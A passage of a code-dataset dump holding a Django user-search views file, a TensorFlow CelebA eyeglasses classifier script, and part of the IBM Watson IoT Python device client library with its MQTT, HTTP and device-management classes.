list(users)})\n\n@csrf_exempt\n@require_GET\n#@login_required\ndef search(request):\n users = UserDocument.search().query('wildcard', username='*' + str(request.GET['name']) + '*')[:10]\n users = users.to_queryset().values('username', 'first_name', 'avatar')\n \n return JsonResponse({'users': list(users)})\n\n\nclass UsersViewSet(viewsets.ModelViewSet):\n \n User = apps.get_model('users', 'User')\n \n serializer_class = UserSerializer\n queryset = User.objects.all()\n \n @action(methods=['get'], detail=False)\n def search_users(self, request):\n users = self.get_queryset()\n users = users.filter(username__contains=request.GET['name'])[:int(request.GET['limit'])]\n serializer = self.get_serializer(users, many=True)\n return Response({'users': serializer.data})\n \n @method_decorator(cache_page(60*15))\n @action(methods=['get'], detail=False)\n def contacts(self, request):\n users = self.get_queryset()\n serializer = self.get_serializer(users, many=True)\n return Response({'contacts': serializer.data})\n\n @action(methods=['get'], detail=False)\n def profile_details(self, request):\n user = self.get_queryset()\n user = user.filter(id=request.user.id).first()\n serializer = self.get_serializer(user, many=False)\n return Response({'profile': serializer.data})\n","sub_path":"messenger/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"229934822","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential\n\nimport matplotlib.pyplot as plt \nimport tempfile\n\nATTR_KEY = \"attributes\"\nIMAGE_KEY = \"image\"\nLABEL_KEY = \"Eyeglasses\"\nIMG_SIZE = 64#256\nBATCH_SIZE = 50\nEPOCHS = 100\n\n# get data set\nprint('>>> Get Data Set')\ngcs_base_dir = 'gs://celeb_a_dataset/'\nceleb_a_builder = tfds.builder('celeb_a', data_dir=gcs_base_dir, version='2.0.0')\nceleb_a_builder.download_and_prepare()\n\ndef preprocess_input_dict(feat_dict):\n # Separate out the image and target variable from the feature dictionary.\n image = feat_dict[IMAGE_KEY]\n label = feat_dict[ATTR_KEY][LABEL_KEY]\n\n # Resize and normalize image.\n image = tf.cast(image, tf.float32)\n image = tf.image.resize(image, [IMG_SIZE, IMG_SIZE])\n image /= 255.0\n\n label = tf.cast(label, tf.float32)\n \n feat_dict[IMAGE_KEY] = image\n feat_dict[ATTR_KEY][LABEL_KEY] = label\n \n return feat_dict\n\nget_image_and_label = lambda feat_dict: (feat_dict[IMAGE_KEY], feat_dict[ATTR_KEY][LABEL_KEY])\n\ndef create_model():\n print('>>> Creating model')\n model = keras.Sequential()\n model.add(keras.layers.Flatten(input_shape=(IMG_SIZE, IMG_SIZE, 3))),\n model.add(keras.layers.Dense(60, input_dim=60, activation='relu'))\n model.add(keras.layers.Dense(1, activation='sigmoid'))\n model.compile(loss = 'binary_crossentropy', \n optimizer='adam', \n metrics=['accuracy'])\n return model\n\ntrain_ds = celeb_a_builder \\\n .as_dataset(split='train') \\\n .batch(BATCH_SIZE) \\\n .map(preprocess_input_dict) \\\n .map(get_image_and_label)\n\ntest_ds = celeb_a_builder \\\n .as_dataset(split='test') \\\n .batch(1) \\\n .map(preprocess_input_dict) \\\n .map(get_image_and_label)\n\nmodel = create_model()\n\nmodel.summary()\n\nhistory = model.fit(train_ds, epochs=3, steps_per_epoch=EPOCHS)\n\nmodel.evaluate(test_ds)\n\ndef save_model(model, subdir):\n base_dir = 
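A hypothetical router hookup for the UsersViewSet above using DRF's DefaultRouter; the module path and basename are assumptions. The @action methods with detail=False surface as list-level routes such as /users/search_users/, /users/contacts/ and /users/profile_details/.

from rest_framework.routers import DefaultRouter

from users.views import UsersViewSet  # assumed module path

router = DefaultRouter()
router.register(r"users", UsersViewSet, basename="user")
urlpatterns = router.urls
# e.g. GET /users/search_users/?name=al&limit=10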
tempfile.mkdtemp(prefix='saved_models')\n model_location = os.path.join(base_dir, subdir)\n model.save(model_location, save_format='tf')\n return model_location\n\nmodel_location = save_model(model, 'model_export_unconstrained')\n\nconverter = tf.lite.TFLiteConverter.from_saved_model(model_location) # path to the SavedModel directory\ntflite_model = converter.convert()\n\nwith open('model.tflite', 'wb') as f:\n f.write(tflite_model)","sub_path":"faces/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"287825147","text":"# *****************************************************************************\n# Copyright (c) 2014 IBM Corporation and other Contributors.\n#\n# All rights reserved. This program and the accompanying materials\n# are made available under the terms of the Eclipse Public License v1.0\n# which accompanies this distribution, and is available at\n# http://www.eclipse.org/legal/epl-v10.html\n#\n# Contributors:\n# David Parker - Initial Contribution\n# Lokesh Haralakatta - Added DME Support\n# *****************************************************************************\n\nimport json\nimport re\nimport pytz\nimport uuid\nimport threading\nimport requests\nimport paho.mqtt.client as paho\n\nfrom datetime import datetime\n\nfrom ibmiotf import AbstractClient, HttpAbstractClient, InvalidEventException, UnsupportedAuthenticationMethod,ConfigurationException, ConnectionException, MissingMessageEncoderException,MissingMessageDecoderException\nfrom ibmiotf.codecs import jsonCodec, jsonIotfCodec\n\n\n# Support Python 2.7 and 3.4 versions of configparser\ntry:\n\timport configparser\nexcept ImportError:\n\timport ConfigParser as configparser\n\nCOMMAND_RE = re.compile(\"iot-2/cmd/(.+)/fmt/(.+)\")\n\n\nclass Command:\n\tdef __init__(self, pahoMessage, messageEncoderModules):\n\t\tresult = COMMAND_RE.match(pahoMessage.topic)\n\t\tif result:\n\t\t\tself.command = result.group(1)\n\t\t\tself.format = result.group(2)\n\n\t\t\tif self.format in messageEncoderModules:\n\t\t\t\tmessage = messageEncoderModules[self.format].decode(pahoMessage)\n\t\t\t\tself.timestamp = message.timestamp\n\t\t\t\tself.data = message.data\n\t\t\telse:\n\t\t\t\traise MissingMessageDecoderException(self.format)\n\t\telse:\n\t\t\traise InvalidEventException(\"Received command on invalid topic: %s\" % (pahoMessage.topic))\n\n\nclass Client(AbstractClient):\n\n\tCOMMAND_TOPIC = \"iot-2/cmd/+/fmt/+\"\n\n\tdef __init__(self, options, logHandlers=None):\n\t\tself._options = options\n\n\t\t### DEFAULTS ###\n\t\tif \"domain\" not in self._options:\n\t\t\t# Default to the domain for the public cloud offering\n\t\t\tself._options['domain'] = \"internetofthings.ibmcloud.com\"\n\t\tif \"clean-session\" not in self._options:\n\t\t\tself._options['clean-session'] = \"true\"\n\n\t\tif \"org\" not in self._options:\n\t\t\t# Default to the quickstart\n\t\t\tself._options['org'] = \"quickstart\"\n\n\t\tif \"port\" not in self._options and self._options[\"org\"] != \"quickstart\":\n\t\t\tself._options[\"port\"] = 8883;\n\n\t\tif self._options[\"org\"] == \"quickstart\":\n\t\t\tself._options[\"port\"] = 1883;\n\n\t\t### REQUIRED ###\n\t\tif self._options['org'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: org\")\n\t\tif self._options['type'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: type\")\n\t\tif self._options['id'] == None:\n\t\t\traise 
ConfigurationException(\"Missing required property: id\")\n\n\t\tif self._options['org'] != \"quickstart\":\n\t\t\tif self._options['auth-method'] == None:\n\t\t\t\traise ConfigurationException(\"Missing required property: auth-method\")\n\n\t\t\tif (self._options['auth-method'] == \"token\"):\n\t\t\t\tif self._options['auth-token'] == None:\n\t\t\t\t\traise ConfigurationException(\"Missing required property for token based authentication: auth-token\")\n\t\t\telse:\n\t\t\t\traise UnsupportedAuthenticationMethod(options['auth-method'])\n\n\t\tAbstractClient.__init__(\n\t\t\tself,\n\t\t\tdomain = self._options['domain'],\n\t\t\torganization = self._options['org'],\n\t\t\tclientId = \"d:\" + self._options['org'] + \":\" + self._options['type'] + \":\" + self._options['id'],\n\t\t\tusername = \"use-token-auth\" if (self._options['auth-method'] == \"token\") else None,\n\t\t\tpassword = self._options['auth-token'],\n\t\t\tlogHandlers = logHandlers,\n\t\t\tcleanSession = self._options['clean-session'],\n\t\t\tport = self._options['port']\n\t\t)\n\n\t\t# Add handler for commands if not connected to QuickStart\n\t\tif self._options['org'] != \"quickstart\":\n\t\t\tself.client.message_callback_add(\"iot-2/cmd/+/fmt/+\", self.__onCommand)\n\n\t\tself.subscriptionsAcknowledged = threading.Event()\n\n\t\t# Initialize user supplied callback\n\t\tself.commandCallback = None\n\n\t\tself.client.on_connect = self.on_connect\n\n\t\tself.setMessageEncoderModule('json', jsonCodec)\n\t\tself.setMessageEncoderModule('json-iotf', jsonIotfCodec)\n\n\n\tdef on_connect(self, client, userdata, flags, rc):\n\t\t'''\n\t\tThis is called after the client has received a CONNACK message from the broker in response to calling connect().\n\t\tThe parameter rc is an integer giving the return code:\n\n\t\t0: Success\n\t\t1: Refused - unacceptable protocol version\n\t\t2: Refused - identifier rejected\n\t\t3: Refused - server unavailable\n\t\t4: Refused - bad user name or password\n\t\t5: Refused - not authorised\n\t\t'''\n\t\tif rc == 0:\n\t\t\tself.connectEvent.set()\n\t\t\tself.logger.info(\"Connected successfully: %s, Port: %s\" % (self.clientId,self.port))\n\t\t\tif self._options['org'] != \"quickstart\":\n\t\t\t\tself.__subscribeToCommands()\n\t\telif rc == 5:\n\t\t\tself.logAndRaiseException(ConnectionException(\"Not authorized: s (%s, %s, %s)\" % (self.clientId, self.username, self.password)))\n\t\telse:\n\t\t\tself.logAndRaiseException(ConnectionException(\"Connection failed: RC= %s\" % (rc)))\n\n\tdef publishEvent(self, event, msgFormat, data, qos=0, on_publish=None):\n\t\t'''\n\t\tPublish an event in IoTF.\n\n\t\tParameters:\n\t\t\tevent - the name of this event\n\t\t\tmsgFormat - the format of the data for this event\n\t\t\tdata - the data for this event\n\n\t\tOptional paramters:\n\t\t\tqos - the equivalent MQTT semantics of quality of service using the same constants (0, 1 and 2)\n\t\t\ton_publish - a function that will be called when receipt of the publication is confirmed. 
This\n\t\t\t\t\t\t has different implications depending on the qos:\n\t\t\t\t\t\t qos 0 - the client has asynchronously begun to send the event\n\t\t\t\t\t\t qos 1 and 2 - the client has confirmation of delivery from IoTF\n\t\t'''\n\t\tif not self.connectEvent.wait():\n\t\t\tself.logger.warning(\"Unable to send event %s because device is not currently connected\")\n\t\t\treturn False\n\t\telse:\n\t\t\tself.logger.debug(\"Sending event %s with data %s\" % (event, json.dumps(data)))\n\t\t\ttopic = 'iot-2/evt/'+event+'/fmt/' + msgFormat\n\n\t\t\tif msgFormat in self._messageEncoderModules:\n\t\t\t\tpayload = self._messageEncoderModules[msgFormat].encode(data, datetime.now(pytz.timezone('UTC')))\n\n\t\t\t\ttry:\n\t\t\t\t\t# need to take lock to ensure on_publish is not called before we know the mid\n\t\t\t\t\tif on_publish is not None:\n\t\t\t\t\t\tself._messagesLock.acquire()\n\n\t\t\t\t\tresult = self.client.publish(topic, payload=payload, qos=qos, retain=False)\n\t\t\t\t\tif result[0] == paho.MQTT_ERR_SUCCESS:\n\t\t\t\t\t\tif on_publish is not None:\n\t\t\t\t\t\t\tself._onPublishCallbacks[result[1]] = on_publish\n\t\t\t\t\t\treturn True\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn False\n\t\t\t\tfinally:\n\t\t\t\t\tif on_publish is not None:\n\t\t\t\t\t\tself._messagesLock.release()\n\t\t\telse:\n\t\t\t\traise MissingMessageEncoderException(msgFormat)\n\n\n\tdef __subscribeToCommands(self):\n\t\t'''\n\t\tSubscribe to commands sent to this device.\n\t\t'''\n\t\tif self._options['org'] == \"quickstart\":\n\t\t\tself.logger.warning(\"QuickStart applications do not support commands\")\n\t\t\treturn False\n\n\t\tif not self.connectEvent.wait():\n\t\t\tself.logger.warning(\"Unable to subscribe to commands because device is not currently connected\")\n\t\t\treturn False\n\t\telse:\n\t\t\tself.client.subscribe(Client.COMMAND_TOPIC, qos=1)\n\t\t\treturn True\n\n\tdef __onCommand(self, client, userdata, pahoMessage):\n\t\t'''\n\t\tInternal callback for device command messages, parses source device from topic string and\n\t\tpasses the information on to the registerd device command callback\n\t\t'''\n\t\twith self._recvLock:\n\t\t\tself.recv = self.recv + 1\n\t\ttry:\n\t\t\tcommand = Command(pahoMessage, self._messageEncoderModules)\n\t\texcept InvalidEventException as e:\n\t\t\tself.logger.critical(str(e))\n\t\telse:\n\t\t\tself.logger.debug(\"Received command '%s'\" % (command.command))\n\t\t\tif self.commandCallback: self.commandCallback(command)\n\n\nclass HttpClient(HttpAbstractClient):\n\t\"\"\"\n\tA basic device client with limited capabilies that forgoes an active MQTT connection to the service.\n\t\"\"\"\n\n\tdef __init__(self, options, logHandlers=None):\n\t\tself._options = options\n\n\t\t### DEFAULTS ###\n\t\tif \"domain\" not in self._options:\n\t\t\t# Default to the domain for the public cloud offering\n\t\t\tself._options['domain'] = \"internetofthings.ibmcloud.com\"\n\t\tif \"clean-session\" not in self._options:\n\t\t\tself._options['clean-session'] = \"true\"\n\n\t\t### REQUIRED ###\n\t\tif self._options['org'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: org\")\n\t\tif self._options['type'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: type\")\n\t\tif self._options['id'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: id\")\n\n\t\tif self._options['org'] != \"quickstart\":\n\t\t\tif self._options['auth-method'] == None:\n\t\t\t\traise ConfigurationException(\"Missing required property: 
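Assumed end-to-end usage of the MQTT device Client above; the org, device type/id and token are placeholders, and connect()/disconnect() come from the AbstractClient base class rather than from this file.

options = {
    "org": "myorg",          # placeholder organization
    "type": "mytype",        # placeholder device type
    "id": "device001",       # placeholder device id
    "auth-method": "token",
    "auth-token": "SECRET",  # placeholder token
}
client = Client(options)
client.connect()
# qos=1 waits for delivery confirmation from the service before on_publish fires
client.publishEvent("status", "json", {"temp": 21.5}, qos=1)
client.disconnect()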
auth-method\")\n\n\t\t\tif (self._options['auth-method'] == \"token\"):\n\t\t\t\tif self._options['auth-token'] == None:\n\t\t\t\t\traise ConfigurationException(\"Missing required property for token based authentication: auth-token\")\n\t\t\telse:\n\t\t\t\traise UnsupportedAuthenticationMethod(options['authMethod'])\n\n\t\tHttpAbstractClient.__init__(self,\n\t\tclientId = \"httpDevClient:\" + self._options['org'] + \":\" + self._options['type'] + \":\" + self._options['id'],\n \t\tlogHandlers = logHandlers)\n\t\tself.setMessageEncoderModule('json', jsonCodec)\n\n\n\n\tdef publishEvent(self, event, data):\n\t\t\"\"\"\n\t\tPublish an event over HTTP(s) as JSON\n\t\tThrows a ConnectionException with the message \"Server not found\" if the client is unable to reach the server\n\t\tOtherwise it returns the HTTP status code, (200 - 207 for success)\n\t\t\"\"\"\n\t\tself.logger.debug(\"Sending event %s with data %s\" % (event, json.dumps(data)))\n\n\t\ttemplateUrl = 'https://%s.messaging.%s/api/v0002/device/types/%s/devices/%s/events/%s'\n\n\t\torgid = self._options['org']\n\t\tdeviceType = self._options['type']\n\t\tdeviceId = self._options['id']\n\t\tauthMethod = \"use-token-auth\"\n\t\tauthToken = self._options['auth-token']\n\t\tcredentials = (authMethod, authToken)\n\n\t\tif orgid == 'quickstart':\n\t\t\tauthMethod = None\n\t\t\tauthToken = None\n\n\t\tintermediateUrl = templateUrl % (orgid, self._options['domain'], deviceType, deviceId, event)\n\t\tself.logger.debug(\"URL: %s\",intermediateUrl)\n\t\ttry:\n\t\t\tmsgFormat = \"json\"\n\t\t\tpayload = self._messageEncoderModules[msgFormat].encode(data, datetime.now(pytz.timezone('UTC')))\n\t\t\tresponse = requests.post(intermediateUrl, auth = credentials, data = payload, headers = {'content-type': 'application/json'})\n\t\texcept Exception as e:\n\t\t\tself.logger.error(\"POST Failed\")\n\t\t\tself.logger.error(e)\n\t\t\traise ConnectionException(\"Server not found\")\n\n\t\tif response.status_code >= 300:\n\t\t\tself.logger.warning(response.headers)\n\t\treturn response.status_code\n\n\n\nclass DeviceInfo(object):\n\tdef __init__(self):\n\t\tself.serialNumber = None\n\t\tself.manufacturer = None\n\t\tself.model = None\n\t\tself.deviceClass = None\n\t\tself.description = None\n\t\tself.fwVersion = None\n\t\tself.hwVersion = None\n\t\tself.descriptiveLocation = None\n\n\tdef __str__(self):\n\t\treturn json.dumps(self.__dict__, sort_keys=True)\n\n\nclass DeviceFirmware(object):\n\tdef __init__(self,version = None,name = None,url = None,verifier = None,state = None,updateStatus = None,updatedDateTime = None):\n\t\tself.version = version\n\t\tself.name = name\n\t\tself.url = url\n\t\tself.verifier = verifier\n\t\tself.state = state\n\t\tself.updateStatus = updateStatus\n\t\tself.updatedDateTime = updatedDateTime\n\n\tdef __str__(self):\n\t\treturn json.dumps(self.__dict__, sort_keys=True)\n\n\nclass ManagedClient(Client):\n\n\t# Publish MQTT topics\n\tMANAGE_TOPIC = 'iotdevice-1/mgmt/manage'\n\tUNMANAGE_TOPIC = 'iotdevice-1/mgmt/unmanage'\n\tUPDATE_LOCATION_TOPIC = 'iotdevice-1/device/update/location'\n\tADD_ERROR_CODE_TOPIC = 'iotdevice-1/add/diag/errorCodes'\n\tCLEAR_ERROR_CODES_TOPIC = 'iotdevice-1/clear/diag/errorCodes'\n\tNOTIFY_TOPIC = 'iotdevice-1/notify'\n\tRESPONSE_TOPIC = 'iotdevice-1/response'\n\tADD_LOG_TOPIC = 'iotdevice-1/add/diag/log'\n\tCLEAR_LOG_TOPIC = 'iotdevice-1/clear/diag/log'\n\n\t# Subscribe MQTT topics\n\tDM_RESPONSE_TOPIC = 'iotdm-1/response'\n\tDM_OBSERVE_TOPIC = 'iotdm-1/observe'\n\tDM_REBOOT_TOPIC = 
'iotdm-1/mgmt/initiate/device/reboot'\n\tDM_FACTORY_REESET = 'iotdm-1/mgmt/initiate/device/factory_reset'\n\tDM_UPDATE_TOPIC = 'iotdm-1/device/update'\n\tDM_CANCEL_OBSERVE_TOPIC = 'iotdm-1/cancel'\n\tDM_FIRMWARE_DOWNLOAD_TOPIC = 'iotdm-1/mgmt/initiate/firmware/download'\n\tDM_FIRMWARE_UPDATE_TOPIC = 'iotdm-1/mgmt/initiate/firmware/update'\n\tDME_ACTION_TOPIC = 'iotdm-1/mgmt/custom/#'\n\n\t#ResponseCode\n\tRESPONSECODE_FUNCTION_NOT_SUPPORTED = 501\n\tRESPONSECODE_ACCEPTED = 202\n\tRESPONSECODE_INTERNAL_ERROR = 500\n\tRESPONSECODE_BAD_REQUEST = 400\n\n\tUPDATESTATE_IDLE = 0\n\tUPDATESTATE_DOWNLOADING = 1\n\tUPDATESTATE_DOWNLOADED = 2\n\tUPDATESTATE_SUCCESS = 0\n\tUPDATESTATE_IN_PROGRESS = 1\n\tUPDATESTATE_OUT_OF_MEMORY = 2\n\tUPDATESTATE_CONNECTION_LOST = 3\n\tUPDATESTATE_VERIFICATION_FAILED = 4\n\tUPDATESTATE_UNSUPPORTED_IMAGE = 5\n\tUPDATESTATE_INVALID_URI = 6\n\n\n\tdef __init__(self, options, logHandlers=None, deviceInfo=None):\n\t\tif options['org'] == \"quickstart\":\n\t\t\traise Exception(\"Unable to create ManagedClient instance. QuickStart devices do not support device management\")\n\n\t\tClient.__init__(self, options, logHandlers)\n\n\t\t# Initialize user supplied callback\n\t\tself.deviceActionCallback = None\n\t\tself.firmwereActionCallback = None\n\t\tself.dmeActionCallback = None\n\n\t\t# Add handler for supported device management commands\n\t\tself.client.message_callback_add(\"iotdm-1/#\", self.__onDeviceMgmtResponse)\n\t\tself.client.message_callback_add(ManagedClient.DM_REBOOT_TOPIC, self.__onRebootRequest)\n\t\tself.client.message_callback_add(ManagedClient.DM_FACTORY_REESET, self.__onFactoryResetRequest)\n\t\tself.client.message_callback_add(ManagedClient.DM_FIRMWARE_UPDATE_TOPIC,self.__onFirmwereUpdate)\n\t\tself.client.message_callback_add(ManagedClient.DM_OBSERVE_TOPIC,self.__onFirmwereObserve)\n\t\tself.client.message_callback_add(ManagedClient.DM_FIRMWARE_DOWNLOAD_TOPIC,self.__onFirmwereDownload)\n\t\tself.client.message_callback_add(ManagedClient.DM_UPDATE_TOPIC,self.__onUpdatedDevice)\n\t\tself.client.message_callback_add(ManagedClient.DM_CANCEL_OBSERVE_TOPIC,self.__onFirmwereCancel)\n\t\tself.client.message_callback_add(ManagedClient.DME_ACTION_TOPIC,self.__onDMEActionRequest)\n\n\t\tself.client.on_subscribe = self.on_subscribe\n\n\t\tself.readyForDeviceMgmt = threading.Event()\n\n\t\t# List of DM requests that have not received a response yet\n\t\tself._deviceMgmtRequestsPendingLock = threading.Lock()\n\t\tself._deviceMgmtRequestsPending = {}\n\n\t\t# List of DM notify hook\n\t\tself._deviceMgmtObservationsLock = threading.Lock()\n\t\tself._deviceMgmtObservations = []\n\n\t\t# Initialize local device data model\n\t\tself.metadata = {}\n\t\tif deviceInfo is not None:\n\t\t\tself._deviceInfo = deviceInfo\n\t\telse:\n\t\t\tself._deviceInfo = DeviceInfo()\n\n\t\tself._location = None\n\t\tself._errorCode = None\n\t\tself.__firmwareUpdate = None\n\n\t\tself.manageTimer = None\n\n\tdef setSerialNumber(self, serialNumber):\n\t\tself._deviceInfo.serialNumber = serialNumber\n\t\treturn self.notifyFieldChange(\"deviceInfo.serialNumber\", serialNumber)\n\n\tdef setManufacturer(self, manufacturer):\n\t\tself._deviceInfo.manufacturer = manufacturer\n\t\treturn self.notifyFieldChange(\"deviceInfo.manufacturer\", manufacturer)\n\n\tdef setModel(self, model):\n\t\tself._deviceInfo.model = model\n\t\treturn self.notifyFieldChange(\"deviceInfo.model\", model)\n\n\tdef 
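exampleSetterUsage(self):\n\t\t# Illustrative sketch (hypothetical helper, not part of the original API):\n\t\t# each setter above caches the value locally and forwards it through\n\t\t# notifyFieldChange(), which returns a threading.Event for fields under\n\t\t# observation (None otherwise, since Event().set() returns None).\n\t\tpending = self.setModel(\"exampleModel\")\n\t\tif pending is not None:\n\t\t\tpending.wait(timeout=10)\n\n\tdef 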
setdeviceClass(self, deviceClass):\n\t\tself._deviceInfo.deviceClass = deviceClass\n\t\treturn self.notifyFieldChange(\"deviceInfo.deviceClass\", deviceClass)\n\n\tdef setDescription(self, description):\n\t\tself._deviceInfo.description = description\n\t\treturn self.notifyFieldChange(\"deviceInfo.description\", description)\n\n\tdef setFwVersion(self, fwVersion):\n\t\tself._deviceInfo.fwVersion = fwVersion\n\t\treturn self.notifyFieldChange(\"deviceInfo.fwVersion\", fwVersion)\n\n\tdef setHwVersion(self, hwVersion):\n\t\tself._deviceInfo.hwVersion = hwVersion\n\t\treturn self.notifyFieldChange(\"deviceInfo.hwVersion\", hwVersion)\n\n\tdef setDescriptiveLocation(self, descriptiveLocation):\n\t\tself._deviceInfo.descriptiveLocation = descriptiveLocation\n\t\treturn self.notifyFieldChange(\"deviceInfo.descriptiveLocation\", descriptiveLocation)\n\n\n\tdef notifyFieldChange(self, field, value):\n\t\twith self._deviceMgmtObservationsLock:\n\t\t\tif field in self._deviceMgmtObservations:\n\t\t\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\t\t\tself.logger.warning(\"Unable to notify service of field change because device is not ready for device management\")\n\t\t\t\t\treturn threading.Event().set()\n\n\t\t\t\treqId = str(uuid.uuid4())\n\t\t\t\tmessage = {\n\t\t\t\t\t\"d\": {\n\t\t\t\t\t\t\"field\": field,\n\t\t\t\t\t\t\"value\": value\n\t\t\t\t\t},\n\t\t\t\t\t\"reqId\": reqId\n\t\t\t\t}\n\n\t\t\t\tresolvedEvent = threading.Event()\n\t\t\t\tself.client.publish(ManagedClient.NOTIFY_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\t\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.NOTIFY_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\t\t\treturn resolvedEvent\n\t\t\telse:\n\t\t\t\treturn threading.Event().set()\n\t'''\n\tThis is called after the client has received a CONNACK message from the broker in response to calling connect().\n\tThe parameter rc is an integer giving the return code:\n\t0: Success\n\t1: Refused - unacceptable protocol version\n\t2: Refused - identifier rejected\n\t3: Refused - server unavailable\n\t4: Refused - bad user name or password\n\t5: Refused - not authorised\n\t'''\n\tdef on_connect(self, client, userdata, flags, rc):\n\t\tif rc == 0:\n\t\t\tself.connectEvent.set()\n\t\t\tself.logger.info(\"Connected successfully: %s, Port: %s\" % (self.clientId,self.port))\n\t\t\tif self._options['org'] != \"quickstart\":\n\t\t\t\tself.client.subscribe( [(ManagedClient.DM_RESPONSE_TOPIC, 1), (ManagedClient.DM_OBSERVE_TOPIC, 1),\n\t\t\t\t(ManagedClient.DM_REBOOT_TOPIC,1),(ManagedClient.DM_FACTORY_REESET,1),(ManagedClient.DM_UPDATE_TOPIC,1),\n\t\t\t\t(ManagedClient.DM_FIRMWARE_UPDATE_TOPIC,1),(ManagedClient.DM_FIRMWARE_DOWNLOAD_TOPIC,1),\n\t\t\t\t(ManagedClient.DM_CANCEL_OBSERVE_TOPIC,1),(Client.COMMAND_TOPIC, 1),(ManagedClient.DME_ACTION_TOPIC,1)] )\n\t\telif rc == 5:\n\t\t\tself.logAndRaiseException(ConnectionException(\"Not authorized: s (%s, %s, %s)\" % (self.clientId, self.username, self.password)))\n\t\telse:\n\t\t\tself.logAndRaiseException(ConnectionException(\"Connection failed: RC= %s\" % (rc)))\n\n\n\tdef on_subscribe(self, client, userdata, mid, granted_qos):\n\t\t# Once IoTF acknowledges the subscriptions we are able to process commands and responses from device management server\n\t\tself.subscriptionsAcknowledged.set()\n\t\tself.manage()\n\n\n\tdef manage(self, lifetime=3600, supportDeviceActions=True, 
supportFirmwareActions=True,\n\t\t\t\t\tsupportDeviceMgmtExtActions=False, bundleIds=None):\n\t\t# TODO: throw an error, minimum lifetime this client will support is 1 hour, but for now set lifetime to infinite if it's invalid\n\t\tif lifetime < 3600:\n\t\t\tlifetime = 0\n\n\t\t# Avoid a mutable default argument\n\t\tif bundleIds is None:\n\t\t\tbundleIds = []\n\n\t\tif not self.subscriptionsAcknowledged.wait():\n\t\t\tself.logger.warning(\"Unable to send register for device management because device subscriptions are not in place\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\t\t'd': {\n\t\t\t\t\t\t\t\"lifetime\": lifetime,\n\t\t\t\t\t\t\t\"supports\": {\n\t\t\t\t\t\t\t\t\t\t\t\"deviceActions\": supportDeviceActions,\n\t\t\t\t\t\t\t\t\t\t\t\"firmwareActions\": supportFirmwareActions,\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"deviceInfo\" : self._deviceInfo.__dict__,\n\t\t\t\t\t\t\t\"metadata\" : self.metadata\n\t\t\t\t\t\t},\n\t\t\t\t\t'reqId': reqId\n\t\t\t\t}\n\t\tif supportDeviceMgmtExtActions and len(bundleIds) > 0:\n\t\t\tfor bundleId in bundleIds:\n\t\t\t\tmessage['d']['supports'][bundleId] = supportDeviceMgmtExtActions\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.MANAGE_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.MANAGE_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\t# Register the future call back to Watson IoT Platform 2 minutes before the device lifetime expiry\n\t\tif lifetime != 0:\n\t\t\tif self.manageTimer is not None:\n\t\t\t\tself.logger.debug(\"Cancelling existing manage timer\")\n\t\t\t\tself.manageTimer.cancel()\n\t\t\t# Timer.start() returns None, so keep a reference to the timer object itself\n\t\t\tself.manageTimer = threading.Timer(lifetime-120, self.manage,\n\t\t            [lifetime, supportDeviceActions, supportFirmwareActions, supportDeviceMgmtExtActions, bundleIds])\n\t\t\tself.manageTimer.start()\n\n\t\treturn resolvedEvent\n\n\n\tdef unmanage(self):\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to set device to unmanaged because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t'reqId': reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.UNMANAGE_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.UNMANAGE_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\tdef setLocation(self, longitude, latitude, elevation=None, accuracy=None):\n\t\t# TODO: Add validation (e.g. 
ensure numeric values)\n\t\tif self._location is None:\n\t\t\tself._location = {}\n\n\t\tself._location['longitude'] = longitude\n\t\tself._location['latitude'] = latitude\n\t\tif elevation:\n\t\t\tself._location['elevation'] = elevation\n\n\t\tself._location['measuredDateTime'] = datetime.now(pytz.timezone('UTC')).isoformat()\n\n\t\tif accuracy:\n\t\t\tself._location['accuracy'] = accuracy\n\t\telif \"accuracy\" in self._location:\n\t\t\tdel self._location[\"accuracy\"]\n\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to publish device location because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"d\": self._location,\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.UPDATE_LOCATION_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.UPDATE_LOCATION_TOPIC, \"message\": message, \"event\": 